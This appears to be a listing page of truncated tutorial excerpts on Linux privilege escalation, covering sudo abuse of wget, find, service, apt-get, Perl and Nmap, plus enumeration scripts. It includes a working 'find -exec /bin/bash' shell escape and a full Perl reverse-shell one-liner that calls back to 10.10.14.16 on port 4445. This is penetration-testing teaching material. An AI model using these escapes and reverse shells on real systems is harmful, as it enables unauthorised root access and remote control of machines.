wget - Privilege Escalation

wget is a free utility for non-interactive download of files from the Web. It supports HTTP, HTTPS, and FTP protocols, as well as retrieval through HTTP proxies. If you get access to use with root privileges it can be harmful.…

laravel - schedule task – crontab

Laravel is a web application framework with expressive, elegant syntax. https://www.easylaravelbook.com/blog/introducing-the-laravel-5-command-scheduler/ https://laravel.com/docs/5.8/scheduling#scheduling-artisan-commands The Laravel command scheduler allows you to manage your task execution dates and times using easily understandable PHP syntax. You'll manage the task execution definitions in app/Console/Kernel.php Scheduling…

Using crontab and command injection privilege escalation

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. https://owasp.org/www-community/attacks/Command_Injection The cron daemon is a long-running process that executes commands at specific dates and times. For…

Local file upload - Magic byte change file type

Magic numbers are the first bits of a file which uniquely identify the type of file. it can be helpful to look for file format signatures and inferring how the application is using them based on these signatures, as well…

find - privilege escalation

find Linux command can help us escape from a restricted shell, if you get to run the program with higher privileges, like NOPASWD entry in /etc/sudoers. How to 1. sudo -l 2. find . -exec /bin/bash \;

service - Privilege Escalation

Sudo (NOPASSWD) service - Privilege Escalation If you ever get to run “service” command with root privileges, you can escape from restricted shell to root. In this example /etc/sudoers has allowed an user to run this program as root without…

apt-get - Privilege escalation

apt-get - Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog…

linux-exploit-suggester - Enumeration Linux kernelLinux-based machine

LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls Start python web server python -m SimpleHTTPServer 9999 Download the script into the server wget…

LinEnum - Linux config enumeration

The art of privilege escalation is a skill that any competent hacker should possess. It's an entire field unto itself, and while it's good to know how to perform the techniques involved manually, it's often more efficient to have a…

Linux config enumeration - linuxprivchecker

This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits. https://github.com/sleventyeleven/linuxprivchecker Execution Download the script…

Linux config enumeration - unix-privesc-checkLinux

Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2).  It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local…

Perl - privilege escalation

Using Perl to elevate privileges using a reverse shell. Exploit Check sudo permissions sudo -l Start a listener on Kali/Parrot nc -lvnp 4445 run perl using sudo as no password is required. sudo /usr/bin/perl -e 'use Socket;$i="10.10.14.16";$p=4445;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Check on…

Nmap - privilege escalation

Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation. Exploit Check what sudo permission the current user has, desired “NOPASSWD” sudo -l…